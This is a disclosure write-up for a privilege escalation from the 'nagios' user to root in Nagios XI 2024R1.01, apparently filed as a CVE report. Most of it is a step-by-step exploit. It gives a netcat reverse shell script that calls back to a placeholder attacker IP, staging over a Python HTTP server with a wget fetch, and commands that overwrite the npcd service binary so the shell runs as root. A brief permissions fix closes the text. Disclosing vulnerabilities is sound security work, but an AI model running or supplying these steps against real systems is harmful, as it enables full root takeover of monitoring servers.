CVE Disovered by: Jarod Jaslow (MAWK)
- Endpoint: Nagios XI Version 2024R1.01
- Vulnerability Type: Privilege Escalation from User "NAGIOS"
- Exploitation Result: Full root access on the target system
- Download the Nagios XI OVA file from: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
- Deploy the OVA to create a fresh instance. -Using my previous report gain RCE on the server
-
As the user "NAGIOS," create a file on the attacker machine with the following content:
#!/bin/bash nc -e /bin/bash <Attacker IP> 4445
-
Host the file on the attacker machine via a Python HTTP server:
python3 -m http.server 8000
-
Start a Netcat (NC) listening server on the attacker machine:
nc -nlvp 4445
-
Fetch the file from the attacker machine:
wget http://<Attacker IP>:8000/npcd
-
Execute the following commands to escalate privileges and receive a connection as root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd cp npcd /usr/local/nagios/bin/npcd sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
It is recommended to restrict the ability of the user "NAGIOS" to write to Nagios service executables that are run as root. This can be achieved by implementing stricter file permissions and access controls for the relevant directories and files associated with Nagios services.
This should be fixed in new releases
CVE: